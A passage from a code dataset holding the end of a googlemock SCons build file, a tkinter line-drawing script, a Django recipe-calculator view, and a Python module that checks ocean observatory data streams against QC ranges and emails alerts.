gmock_main])\nGtestTest(env, 'gmock-nice-strict_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-port_test', [gtest, gmock_main])\nGtestTest(env, 'gmock-spec-builders_test', [gtest, gmock_main])\nGtestTest(env, 'gmock_leak_test_', [gtest, gmock_main])\nGtestTest(env, 'gmock_link_test', [gtest, gmock_main],\n ['../test/gmock_link2_test.cc'])\nGtestTest(env, 'gmock_output_test_', [gtest, gmock])\n#GtestTest(env, 'gmock_stress_test', [gtest, gmock])\nGtestTest(env, 'gmock_test', [gtest, gmock_main])\n# gmock_all_test is commented to save time building and running tests.\n# Uncomment if necessary.\n#GtestTest(env, 'gmock_all_test', [gtest, gmock_main])\n\n############################################################\n# Tests targets using custom environments.\nGtestBinary(env_with_exceptions,\n 'gmock-more-actions-ex_test',\n [gtest_ex, gmock_main_ex],\n ['../test/gmock-more-actions_test.cc'])\n\nGtestBinary(env_without_rtti,\n 'gmock_no_rtti_test',\n [gtest_no_rtti, gmock_main_no_rtti],\n ['../test/gmock-spec-builders_test.cc'])\n\nGtestBinary(env_use_own_tuple,\n 'gmock_use_own_tuple_test',\n [gtest_use_own_tuple, gmock_main_use_own_tuple],\n ['../test/gmock-spec-builders_test.cc'])\n","repo_name":"Sigil-Ebook/flightcrew","sub_path":"src/googlemock/scons/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} +{"seq_id":"259732256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 23 17:16:08 2018\n\n@author: anna\n\"\"\"\n\nfrom tkinter import Tk, Canvas\n\nmaster = Tk()\n\nw = Canvas(master, width=200, height=100,bd=0,highlightthickness=0)\nw.configure(bg=\"purple\")\nw.pack()\n\nw.create_line(100, 100, 0, 0, fill=\"pink\")\nw.create_line(100, 0, 0, 0, fill=\"red\")\nmaster.mainloop()","repo_name":"duyt1001/SciFair2018","sub_path":"tkinterline.py","file_name":"tkinterline.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19339530950","text":"from django.shortcuts import render\n\nDATA = {\n 'omlet': {\n 'яйца, шт': 2,\n 'молоко, л': 0.1,\n 'соль, ч.л.': 0.5,\n },\n 'pasta': {\n 'макароны, г': 0.3,\n 'сыр, г': 0.05,\n },\n 'buter': {\n 'хлеб, ломтик': 1,\n 'колбаса, ломтик': 1,\n 'сыр, ломтик': 1,\n 'помидор, ломтик': 1,\n },\n # можете добавить свои рецепты ;)\n}\ndef index(request):\n return render(request, 'calculator/index.html')\ndef omlet(request):\n #Проверяем - если параметр указан, то множитель меняем на введенное значение, если нет - то множитель равен 1\n if request.GET.get('servings') == None:\n quan = 1\n else:\n quan = int(request.GET.get('servings'))\n recipe = {}\n recipe.update(DATA[request.path.strip('/')])\n for names, amount in recipe.items():\n recipe[names] = amount * quan\n context = {\n 'recipe': recipe\n }\n return render(request=request, template_name='calculator/index.html', context=context)\n# Напишите ваш обработчик. Используйте DATA как источник данных\n# Результат - render(request, 'calculator/index.html', context)\n# В качестве контекста должен быть передан словарь с рецептом:\n# context = {\n# 'recipe': {\n# 'ингредиент1': количество1,\n# 'ингредиент2': количество2,\n# }\n# }\n","repo_name":"Wooft/00_django_homework","sub_path":"1.2-requests-templates/recipes/calculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72833107432","text":"import requests\nfrom requests.packages.urllib3.util.retry import Retry\nimport datetime\nimport pandas as pd\nimport concurrent.futures\nimport logging\nfrom math import isnan\nimport gc\nimport os\nimport glob\nimport json\nimport pickle as pk\nfrom copy import deepcopy\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom jinja2 import Environment\nimport netCDF4 as nc\nimport numpy as np\nfrom sys import getsizeof\n\nQC_PARAMETER_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12578/qcparameters/'\nANNOTATIONS_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12580/anno/find?'\nDEPLOYEMENT_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12587/events/deployment/inv/'\nDATA_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12576/sensor/inv/'\nDATA_TEAM_PORTAL_URL = 'http://ooi.visualocean.net/data-streams/science/'\n\n# out_dir = '/home/knuth/ooi_stats/alerts/output/'\nout_dir = '/Users/knuth/Documents/ooi/repos/github/ooi_stats/alerts/output/'\n\nvirtual_times = ['time','met_timeflx','botsflu_time15s','botsflu_time24h']\nCE_cabled = [\"CE02SHBP\", \"CE04OSBP\", \"CE04OSPS\"]\n\nntp_epoch = datetime.datetime(1900, 1, 1)\nunix_epoch = datetime.datetime(1970, 1, 1)\nntp_delta = (unix_epoch - ntp_epoch).total_seconds()\n\npool = concurrent.futures.ThreadPoolExecutor(max_workers=20)\nsession = requests.session()\nretry = Retry(total=10, backoff_factor=0.3,)\nadapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=retry, pool_block=True)\nsession.mount('https://', adapter)\n\n\n\ndef request_data(url,username,token):\n auth = (username, token)\n return session.get(url,auth=auth)\n\ndef to_integer(dt_time):\n return 10000*dt_time.year + 100*dt_time.month + dt_time.day\n\ndef diff_days(d1,d2):\n return (d2 - d1).days\n\ndef create_dir(new_dir):\n # Check if dir exists.. if it doesn't... create it.\n if not os.path.isdir(new_dir):\n try:\n os.makedirs(new_dir)\n except OSError:\n if os.path.exists(new_dir):\n pass\n else:\n raise\n\ndef get_most_recent(array):\n try:\n param_dir = out_dir + array+'/'+'param'+'/*'\n stream_dir = out_dir + array+'/'+'stream'+'/*'\n method_dir = out_dir + array+'/'+'method'+'/*'\n refdes_dir = out_dir + array+'/'+'refdes'+'/*'\n\n param_list_of_files = glob.glob(param_dir)\n stream_list_of_files = glob.glob(stream_dir)\n method_list_of_files = glob.glob(method_dir)\n refdes_list_of_files = glob.glob(refdes_dir)\n\n\n param_latest_file = max(param_list_of_files, key=os.path.getctime)\n stream_latest_file = max(stream_list_of_files, key=os.path.getctime)\n method_latest_file = max(method_list_of_files, key=os.path.getctime)\n refdes_latest_file = max(refdes_list_of_files, key=os.path.getctime)\n\n with open(param_latest_file, 'rb') as f:\n param_most_recent = pk.load(f)\n with open(stream_latest_file, 'rb') as f:\n stream_most_recent = pk.load(f)\n with open(method_latest_file, 'rb') as f:\n method_most_recent = pk.load(f)\n with open(refdes_latest_file, 'rb') as f:\n refdes_most_recent = pk.load(f)\n\n return param_most_recent, stream_most_recent, method_most_recent, refdes_most_recent\n\n except:\n param_most_recent = pd.DataFrame(columns =['refdes','method','stream','parameter'])\n stream_most_recent = pd.DataFrame(columns =['refdes','method','stream'])\n method_most_recent = pd.DataFrame(columns =['refdes','method_type'])\n refdes_most_recent = pd.DataFrame(columns =['refdes'])\n\n return param_most_recent, stream_most_recent, method_most_recent, refdes_most_recent\n\n\n\n\n\n\n\ndef request_gr(username, token):\n print(\"requesting qc data...\")\n r = requests.get(QC_PARAMETER_URL, auth=(username, token))\n data = r.json()\n\n refdes_qc_list = []\n parameter_qc_list = []\n globalrange_min_qc_list = []\n\n for i in range(len(data)):\n if data[i]['qcParameterPK']['qcId'] == 'dataqc_globalrangetest_minmax' \\\n and data[i]['qcParameterPK']['parameter'] == 'dat_min':\n \n refdes = data[i]['qcParameterPK']['refDes']['subsite']+'-'+\\\n data[i]['qcParameterPK']['refDes']['node']+'-'+\\\n data[i]['qcParameterPK']['refDes']['sensor']\n refdes_qc_list.append(refdes)\n \n parameter = data[i]['qcParameterPK']['streamParameter']\n parameter_qc_list.append(parameter)\n \n globalrange_min = data[i]['value']\n globalrange_min_qc_list.append(globalrange_min)\n\n qc_dict = {\n 'refdes':refdes_qc_list,\n 'parameter':parameter_qc_list,\n 'global_range_min':globalrange_min_qc_list,\n } \n \n globalrange_min_qc_data = pd.DataFrame(qc_dict,columns=['refdes','parameter','global_range_min'])\n\n refdes_qc_list = []\n parameter_qc_list = []\n globalrange_max_qc_list = []\n\n for i in range(len(data)):\n if data[i]['qcParameterPK']['qcId'] == 'dataqc_globalrangetest_minmax' \\\n and data[i]['qcParameterPK']['parameter'] == 'dat_max':\n \n refdes = data[i]['qcParameterPK']['refDes']['subsite']+'-'+\\\n data[i]['qcParameterPK']['refDes']['node']+'-'+\\\n data[i]['qcParameterPK']['refDes']['sensor']\n refdes_qc_list.append(refdes)\n \n parameter = data[i]['qcParameterPK']['streamParameter']\n parameter_qc_list.append(parameter)\n \n globalrange_max = data[i]['value']\n globalrange_max_qc_list.append(globalrange_max)\n\n qc_dict = {\n 'refdes':refdes_qc_list,\n 'parameter':parameter_qc_list,\n 'global_range_max':globalrange_max_qc_list,\n } \n \n globalrange_max_qc_data = pd.DataFrame(qc_dict,columns=['refdes','parameter','global_range_max'])\n\n global_ranges = pd.merge(globalrange_min_qc_data,globalrange_max_qc_data, on=['refdes','parameter'], how='outer')\n\n return global_ranges\n\n\n\n\n\n\ndef check_sci_v_gr(array, global_ranges,request_inputs):\n print(\" checking science classifications vs what has global range qc values...\")\n ranges = global_ranges[['refdes','parameter']].drop_duplicates()\n \n if array == 'CE':\n ranges = ranges[ranges.refdes.str.contains('|'.join(CE_cabled))==False]\n ranges = ranges[ranges.refdes.str.startswith(array)]\n\n if array == 'RS':\n ranges_temp = ranges[ranges.refdes.str.contains('|'.join(CE_cabled))]\n ranges_temp2 = ranges[ranges.refdes.str.startswith(array)]\n ranges = pd.concat([ranges_temp,ranges_temp2])\n\n expected = request_inputs[['refdes','parameter']].drop_duplicates()\n not_found = ranges.merge(expected,indicator=True, how='outer')\n missing_gr_qc_values = not_found[not_found['_merge'] == 'right_only']\n del missing_gr_qc_values['_merge']\n missing_science_classification = not_found[not_found['_merge'] == 'left_only']\n del missing_science_classification['_merge']\n \n return missing_gr_qc_values , missing_science_classification\n\n\n\n\n\ndef request_annotations(array, username, token):\n beginDT = int(nc.date2num(datetime.datetime.strptime(\"2012-01-01T01:00:01Z\",'%Y-%m-%dT%H:%M:%SZ'),'seconds since 1970-01-01')*1000)\n endDT = int(nc.date2num(datetime.datetime.utcnow(),'seconds since 1970-01-01')*1000) \n\n refdes_in = DATA_TEAM_PORTAL_URL + array\n refdes_list = pd.read_csv(refdes_in)\n refdes_list = refdes_list[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list.columns = ['refdes','method', 'stream','parameter']\n refdes_list = refdes_list['refdes']\n\n # added regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_list = refdes_list[refdes_list.str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_in_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_list_CE = pd.read_csv(refdes_in_CE)\n refdes_list_CE = refdes_list_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_list_CE = refdes_list_CE['refdes']\n refdes_list_CE = refdes_list_CE[refdes_list_CE.str.contains('|'.join(CE_cabled))]\n refdes_list = pd.concat([refdes_list_CE,refdes_list])\n\n refdes_list = refdes_list.drop_duplicates()\n\n print(\" building annotation info requests...\")\n anno_requests = []\n for i in refdes_list:\n request_url = ANNOTATIONS_URL+'beginDT='+str(beginDT)+'&endDT='+str(endDT)+'&refdes='+i\n anno_requests.append(request_url)\n \n print(\" sending annotation info requests...\")\n ref_des_list = []\n future_to_url = {pool.submit(request_data, url, username, token): url for url in anno_requests}\n for future in concurrent.futures.as_completed(future_to_url):\n url_rf = future_to_url[future]\n try:\n anno_info = future.result()\n anno_info = anno_info.json()\n \n for i in range(len(anno_info)):\n if anno_info[i]['endDT'] is None and anno_info[i]['qcFlag'] == 'not_operational':\n refdes = url_rf[111:]\n ref_des_list.append(refdes)\n except:\n pass\n\n \n data_dict={\n 'refdes':ref_des_list}\n\n not_operational = pd.DataFrame(data_dict, columns = ['refdes'])\n\n return not_operational\n\n\n\n\n\n\ndef alert_request_deployments(array, username, token):\n refdes_in = DATA_TEAM_PORTAL_URL + array\n refdes_list = pd.read_csv(refdes_in)\n refdes_list = refdes_list[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list.columns = ['refdes','method', 'stream','parameter']\n refdes_list = refdes_list['refdes']\n\n # added regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_list = refdes_list[refdes_list.str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_in_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_list_CE = pd.read_csv(refdes_in_CE)\n refdes_list_CE = refdes_list_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_list_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_list_CE = refdes_list_CE['refdes']\n refdes_list_CE = refdes_list_CE[refdes_list_CE.str.contains('|'.join(CE_cabled))]\n refdes_list = pd.concat([refdes_list_CE,refdes_list])\n\n refdes_list = refdes_list.drop_duplicates()\n\n print(\"working on\", array)\n print(\" building deployment info requests...\")\n asset_requests = []\n for i in refdes_list:\n sub_site = i[:8]\n platform = i[9:14]\n instrument = i[15:27]\n asset_url_inputs = '/'.join((sub_site, platform, instrument))\n request_url = DEPLOYEMENT_URL+asset_url_inputs+'/-1'\n asset_requests.append(request_url)\n\n print(\" sending deployment info requests...\")\n ref_des_list = []\n start_time_list = []\n deployment_list = []\n\n start_time = datetime.datetime.utcnow() - datetime.timedelta(seconds=86400)\n\n future_to_url = {pool.submit(request_data, url, username, token): url for url in asset_requests}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n asset_info = future.result()\n asset_info = asset_info.json()\n\n for i in range(len(asset_info)):\n if asset_info[i]['eventStopTime'] is None:\n refdes = asset_info[i]['referenceDesignator']\n ref_des_list.append(refdes)\n \n deployment = asset_info[i]['deploymentNumber']\n deployment_list.append(deployment)\n start_time_list.append(start_time)\n except:\n pass\n \n data_dict={\n 'refdes':ref_des_list,\n 'deployment':deployment_list,\n 'start_time':start_time_list}\n\n alert_deployment_data = pd.DataFrame(data_dict, columns = ['refdes', 'deployment','start_time'])\n\n return alert_deployment_data\n\n\n\n\n\n\n\ndef alert_build_requests(array, alert_deployment_data):\n print(\" building data request urls...\")\n\n refdes_streams = DATA_TEAM_PORTAL_URL + array\n refdes_streams_df = pd.read_csv(refdes_streams)\n refdes_streams_df = refdes_streams_df[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_streams_df.columns = ['refdes','method', 'stream','parameter']\n refdes_streams_df = refdes_streams_df[refdes_streams_df['method'].str.contains(\"recovered\")==False]\n\n # regex search to exclude or grab cabled cabled assets to produce complete Endurance and Cabled Array outputs\n if array == 'CE':\n refdes_streams_df = refdes_streams_df[refdes_streams_df['refdes'].str.contains('|'.join(CE_cabled))==False]\n\n if array == 'RS':\n refdes_streams_CE = DATA_TEAM_PORTAL_URL + 'CE'\n refdes_streams_df_CE = pd.read_csv(refdes_streams_CE)\n refdes_streams_df_CE = refdes_streams_df_CE[['reference_designator','method', 'stream_name','parameter_name']]\n refdes_streams_df_CE.columns = ['refdes','method', 'stream','parameter']\n refdes_streams_df_CE = refdes_streams_df_CE[refdes_streams_df_CE['method'].str.contains(\"recovered\")==False]\n refdes_streams_df_CE = refdes_streams_df_CE[refdes_streams_df_CE['refdes'].str.contains('|'.join(CE_cabled))]\n refdes_streams_df = pd.concat([refdes_streams_df_CE,refdes_streams_df])\n\n refdes_streams_df = refdes_streams_df.drop_duplicates()\n\n request_inputs = pd.merge(refdes_streams_df,alert_deployment_data, on='refdes')\n\n request_inputs['subsite'] = request_inputs.refdes.str[:8]\n request_inputs['platform'] = request_inputs.refdes.str[9:14]\n request_inputs['instrument'] = request_inputs.refdes.str[15:27]\n request_inputs['date'] = pd.to_datetime(request_inputs['start_time'])\n request_inputs['date'] = request_inputs.date.dt.strftime('%Y-%m-%dT%H:%M:%S.000Z')\n\n\n request_inputs['urls'] = DATA_URL+\\\n request_inputs.subsite+\\\n '/'+request_inputs.platform+\\\n '/'+request_inputs.instrument+\\\n '/'+request_inputs.method+\\\n '/'+request_inputs.stream+\\\n '?beginDT='+request_inputs.date+\\\n '&limit=1000'\n\n request_urls = request_inputs['urls'].drop_duplicates()\n request_urls = request_urls.values.tolist()\n\n return request_urls , request_inputs\n\n\n\n\n\n\n\n\n\ndef send_gr_data_requests(array,request_urls,global_ranges,username,token):\n\n print(' sending data requests...')\n \n\n ooi_parameter_data_gr = pd.DataFrame()\n missing = []\n\n future_to_url = {pool.submit(request_data, url, username, token): url for url in request_urls}\n for future in concurrent.futures.as_completed(future_to_url):\n # url = future_to_url[future]\n try:\n data = future.result() \n data = data.json()\n\n refdes_list = []\n parameter_list = []\n method_list = []\n stream_list = []\n timestamp_list = []\n value_list = []\n \n # use this to speed up the loop\n # df = pd.DataFrame.from_records(map(json.loads, map(json.dumps,data)))\n\n refdes = data[-1]['pk']['subsite'] + '-' + data[-1]['pk']['node'] + '-' + data[-1]['pk']['sensor']\n method = data[-1]['pk']['method']\n stream = data[-1]['pk']['stream']\n\n y = global_ranges[global_ranges['refdes'] == refdes]\n\n for i in range(len(data)):\n for ts in virtual_times:\n # print('yes')\n try:\n timestamp = data[i][ts]\n timestamp = datetime.datetime.utcfromtimestamp(timestamp - ntp_delta).replace(microsecond=0)\n timestamp = timestamp.date()\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(ts)\n value_list.append(data[i][ts])\n timestamp_list.append(timestamp)\n except:\n continue\n \n if y.empty:\n missing.append(refdes)\n continue\n\n else:\n for var in y.parameter.values:\n for j in data[i].keys():\n if var == j:\n z = data[i][j]\n # conditional to handle 2d datasets, in which case the first non nan value is checked\n if type(z) != list:\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(var)\n value_list.append(z)\n timestamp_list.append(timestamp)\n else:\n u = next(u for u in z if not isnan(u))\n refdes_list.append(refdes)\n method_list.append(method)\n stream_list.append(stream)\n parameter_list.append(var)\n value_list.append(u)\n timestamp_list.append(timestamp)\n\n # create data frame from lists collected above\n data_dict = {\n 'refdes':refdes_list,\n 'method':method_list,\n 'stream':stream_list,\n 'parameter':parameter_list,\n 'value':value_list,\n 'date':timestamp_list}\n response_data = pd.DataFrame(data_dict, columns = ['refdes','method','stream','parameter','value','date'])\n \n # subset to mode time stamp of response to omit data returned outside time range (day) requested\n response_data = response_data.loc[response_data['date'] == response_data['date'].mode()[0]]\n\n for ts in virtual_times:\n if ts in response_data['parameter'].values:\n data_length = len(response_data[response_data['parameter'] == ts])\n else:\n continue\n \n # merge into data frame with global range values and check if value between global ranges\n df = y.merge(response_data,indicator=True,how='outer')\n df['pass'] = (df['value'] < pd.to_numeric(df['global_range_max'])) & \\\n (df['value'] > pd.to_numeric(df['global_range_min'])) \n\n # assign true to all time parameter instances\n for ts in virtual_times:\n try:\n df.loc[df['parameter'] == ts, 'pass'] = True\n except:\n continue\n \n\n # collapse the data frame to calculate percent of data points that pass the test for that day\n df2 = df['pass'].groupby([df['refdes'], \\\n df['method'], \\\n df['stream'], \\\n df['parameter'],\\\n df['date'] \\\n ]).sum().reset_index()\n\n\n df2['percent'] = (df2['pass'] / data_length) * 100\n df2['data_points'] = data_length\n # df2 = df2[['refdes','method','stream','parameter','date','data_points','percent']]\n\n # append result for this ref des and day to final data frame\n ooi_parameter_data_gr = ooi_parameter_data_gr.append(df2)\n # ooi_parameter_data_gr = ooi_parameter_data_gr.drop_duplicates()\n # print(getsizeof(ooi_parameter_data_gr))\n gc.collect()\n \n except:\n # print('no data for ', url)\n pass\n\n\n\n # subset resonse to only return instances where more than 50% of the data points returned pass the global range test. \n # time always passes the test, so stream availability is not lost.\n try:\n ooi_parameter_data_gr['value'] = np.where(ooi_parameter_data_gr['percent'] > 50, 1, 0)\n ooi_parameter_data_gr = ooi_parameter_data_gr[ooi_parameter_data_gr['value'] == 1]\n ooi_parameter_data_gr = ooi_parameter_data_gr[['refdes','method','stream','parameter','date','value']]\n ooi_parameter_data_gr = ooi_parameter_data_gr.drop_duplicates()\n except:\n ooi_parameter_data_gr = pd.DataFrame(columns=['refdes','method','stream','parameter','date','value'])\n pass\n gc.collect()\n\n # print(getsizeof(ooi_parameter_data_gr))\n\n return ooi_parameter_data_gr\n\n\n\n\n\n\n\n\ndef alert_create_all_outputs(array,ooi_parameter_data_gr,request_inputs):\n # parameter level output\n param_inputs = request_inputs[['refdes','method','stream', 'parameter']].copy()\n param_inputs = param_inputs.drop_duplicates()\n param_result = ooi_parameter_data_gr[['refdes','method','stream','parameter']].copy()\n param_result = param_result.drop_duplicates()\n failed_gr_qc = param_result.merge(param_inputs,indicator=True,how='outer')\n failed_gr_qc = failed_gr_qc[failed_gr_qc['_merge'] == 'right_only']\n del failed_gr_qc['_merge']\n failed_gr_qc['value'] = 0\n param_result['value'] = 1\n param_final = pd.concat([param_result, failed_gr_qc])\n\n # stream level rollup\n stream_inputs = request_inputs[['refdes','method','stream']].copy()\n stream_inputs = stream_inputs.drop_duplicates()\n stream_result = ooi_parameter_data_gr[['refdes','method','stream']].copy()\n stream_result = stream_result.drop_duplicates()\n missing_streams = stream_result.merge(stream_inputs,indicator=True,how='outer')\n missing_streams = missing_streams[missing_streams['_merge'] == 'right_only']\n del missing_streams['_merge']\n missing_streams['value'] = 0\n stream_result['value'] = 1\n stream_final = pd.concat([stream_result,missing_streams])\n\n\n #method level output\n method_inputs = request_inputs[['refdes','method']].copy()\n method_inputs = method_inputs.drop_duplicates()\n x = list(method_inputs.method.values)\n y = []\n for i in x:\n if 'recovered' in i:\n y.append('recovered')\n elif 'telemetered' in i:\n y.append('telemetered')\n elif 'streamed' in i:\n y.append('streamed')\n method_inputs['method_type'] = y\n del method_inputs['method']\n method_inputs = method_inputs.drop_duplicates()\n method_result = ooi_parameter_data_gr[['refdes','method']].copy()\n method_result = method_result.drop_duplicates()\n x = list(method_result.method.values)\n y = []\n for i in x:\n if 'recovered' in i:\n y.append('recovered')\n elif 'telemetered' in i:\n y.append('telemetered')\n elif 'streamed' in i:\n y.append('streamed')\n method_result['method_type'] = y\n del method_result['method']\n method_result = method_result.drop_duplicates()\n missing_methods = method_result.merge(method_inputs,indicator=True,how='outer')\n missing_methods = missing_methods[missing_methods['_merge'] == 'right_only']\n del missing_methods['_merge']\n missing_methods['value'] = 0\n method_result['value'] = 1\n method_final = pd.concat([method_result, missing_methods])\n\n # refdes level rollup\n refdes_inputs = request_inputs[['refdes']].copy()\n refdes_inputs = refdes_inputs.drop_duplicates()\n refdes_result = ooi_parameter_data_gr[['refdes']].copy()\n refdes_result = refdes_result.drop_duplicates()\n missing_refdes = refdes_result.merge(refdes_inputs,indicator=True,how='outer')\n missing_refdes = missing_refdes[missing_refdes['_merge'] == 'right_only']\n del missing_refdes['_merge']\n missing_refdes['value'] = 0\n refdes_result['value'] = 1\n refdes_final = pd.concat([refdes_result, missing_refdes])\n\n return param_final, stream_final, method_final, refdes_final\n\n\n\n\n\n\n\n\n\ndef alert_create_missing_output(array, param_final, stream_final, method_final, refdes_final, missing_gr_qc_values):\n print(' writing output...')\n\n param_final_out_temp = param_final[param_final['value'] == 0]\n del param_final_out_temp['value']\n stream_final_out = stream_final[stream_final['value'] == 0]\n del stream_final_out['value']\n method_final_out = method_final[method_final['value'] == 0]\n del method_final_out['value']\n refdes_final_out = refdes_final[refdes_final['value'] == 0]\n del refdes_final_out['value']\n\n # only capture parameters not contained in streams that are missing entirely\n param_final_out_temp2 = param_final_out_temp.merge(stream_final_out,indicator=True, how='outer')\n param_final_out_temp2 = param_final_out_temp2[param_final_out_temp2['_merge'] == 'left_only']\n del param_final_out_temp2['_merge']\n\n # only capture parameters that are actually failing the global range test, not missing because no values have been entered.\n param_final_out = missing_gr_qc_values.merge(param_final_out_temp2,indicator=True, how='outer')\n param_final_out = param_final_out[param_final_out['_merge'] == 'right_only']\n del param_final_out['_merge']\n param_final_out = param_final_out[['refdes','method','stream','parameter']]\n\n param_dir = out_dir + array+'/'+'param'+'/'\n create_dir(param_dir)\n stream_dir = out_dir + array+'/'+'stream'+'/'\n create_dir(stream_dir)\n method_dir = out_dir + array+'/'+'method'+'/'\n create_dir(method_dir)\n refdes_dir = out_dir + array+'/'+'refdes'+'/'\n create_dir(refdes_dir)\n\n out = param_dir + array + '_param_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(param_final_out,fh)\n\n out = stream_dir + array + '_stream_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(stream_final_out,fh)\n\n out = method_dir + array + '_method_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(method_final_out,fh)\n\n out = refdes_dir + array + '_refdes_data_'+ datetime.datetime.utcnow().strftime('%Y-%m-%d') + '.pd'\n with open(out, 'wb') as fh:\n pk.dump(refdes_final_out,fh)\n\n return param_final_out, stream_final_out, method_final_out, refdes_final_out\n\n\n\n\n\n\n\n\ndef compare_operational(not_operational, stream_final_out, request_inputs):\n difference = stream_final_out.merge(not_operational,indicator=True, how='outer')\n annotated_and_not_operational = difference[difference['_merge'] == 'both']\n no_data_not_annotated = difference[difference['_merge'] == 'left_only']\n data_but_annotated = difference[difference['_merge'] == 'right_only']\n del annotated_and_not_operational['_merge']\n del no_data_not_annotated['_merge']\n data_but_annotated = data_but_annotated[['refdes']]\n\n request_inputs = request_inputs[['refdes']]\n request_inputs = request_inputs.drop_duplicates()\n data_but_annotated = request_inputs.merge(data_but_annotated,indicator=True, how='outer')\n data_but_annotated = data_but_annotated[data_but_annotated['_merge'] == 'both']\n del data_but_annotated['_merge']\n \n return no_data_not_annotated, annotated_and_not_operational, data_but_annotated\n\n\n\n\n\n\n\ndef stream_compare_output(array, stream_final_out, stream_most_recent, request_inputs): \n try:\n print(' comparing stream output to most recent...')\n difference = stream_most_recent.merge(stream_final_out,indicator=True, how='outer')\n stream_difference_new = difference[difference['_merge'] == 'right_only']\n stream_difference_resumed = difference[difference['_merge'] == 'left_only']\n del stream_difference_new['_merge']\n del stream_difference_resumed['_merge']\n\n # check that the resumed stream is still expected\n request_inputs = request_inputs[['refdes','method','stream']]\n request_inputs = request_inputs.drop_duplicates()\n stream_difference_resumed = request_inputs.merge(stream_difference_resumed,indicator=True, how='outer')\n stream_difference_resumed = stream_difference_resumed[stream_difference_resumed['_merge'] == 'both']\n del stream_difference_resumed['_merge']\n return stream_difference_new , stream_difference_resumed\n\n except:\n print(' nothing to compare to...')\n stream_difference_resumed = pd.DataFrame()\n stream_difference_new = pd.DataFrame()\n return stream_difference_new , stream_difference_resumed\n\n\n\n\ndef parameter_compare_output(array, param_final_out, param_most_recent, request_inputs): \n try:\n print(' comparing param output to most recent...')\n difference = param_most_recent.merge(param_final_out,indicator=True, how='outer')\n param_difference_new = difference[difference['_merge'] == 'right_only']\n param_difference_resumed = difference[difference['_merge'] == 'left_only']\n del param_difference_new['_merge']\n del param_difference_resumed['_merge']\n\n\n # check that the resumed parameter is still expected\n request_inputs = request_inputs[['refdes','method','stream','parameter']]\n request_inputs = request_inputs.drop_duplicates()\n param_difference_resumed = request_inputs.merge(param_difference_resumed,indicator=True, how='outer')\n param_difference_resumed = param_difference_resumed[param_difference_resumed['_merge'] == 'both']\n del param_difference_resumed['_merge']\n\n return param_difference_new , param_difference_resumed\n\n\n except:\n print(' nothing to compare to...')\n param_difference_resumed = pd.DataFrame()\n param_difference_new = pd.DataFrame()\n return param_difference_new , param_difference_resumed\n\n\n\n\n\n\ndef sendEmail(msg,recipients):\n print(' sending alert...')\n recipients = recipients\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(\"ooidatateam@gmail.com\", \"\")\n server.sendmail(\"ooidatateam@gmail.com\",recipients,msg.as_string())\n\ndef print_html_doc(html_template,text):\n return Environment().from_string(html_template).render(body=text)\n\ndef alert_send(array,no_data_not_annotated,annotated_and_not_operational,data_but_annotated,stream_difference_new,stream_difference_resumed,param_final_out, param_difference_new,param_difference_resumed,missing_gr_qc_values,missing_science_classification,RS_recipients,CE_recipients,GA_recipients,CP_recipients):\n html_template = \"\"\"\n \n {{ body }}\n \n \"\"\"\n\n if stream_difference_new.empty and data_but_annotated.empty and stream_difference_resumed.empty and param_difference_new.empty and param_difference_resumed.empty:\n text = '

    Ongoing Issues

    '\n pass\n else:\n text = '

    New Alert

    '\n # text = text + '
    *Alerts are only sent once when there is a new alert. If and instrument resumes producing data a new alert will be sent.

    '\n\n if stream_difference_new.empty: \n pass\n else:\n text = text + 'Instruments and streams that have not produced data in the past 24 hours:

    '\n f = stream_difference_new.to_html()\n text = text + str(f) + '

    '\n\n if data_but_annotated.empty:\n pass\n else:\n text = text + 'Instruments that are annotated as not_operational, but have resumed producing data:

    '\n f = data_but_annotated.to_html()\n text = text + str(f) + '

    '\n\n if param_difference_new.empty:\n pass\n else:\n text = text + 'Parameters not producing data within global ranges in the past 24 hours:

    '\n f = param_difference_new.to_html()\n text = text + str(f) + '

    '\n\n if stream_difference_resumed.empty:\n pass\n else:\n text = text + 'Instruments and streams that resumed producing data in the past 24 hours:

    '\n f = stream_difference_resumed.to_html()\n text = text + str(f) + '

    '\n\n if param_difference_resumed.empty:\n pass\n else:\n text = text + 'Parameters that resumed producing data within global ranges in the past 24 hours:

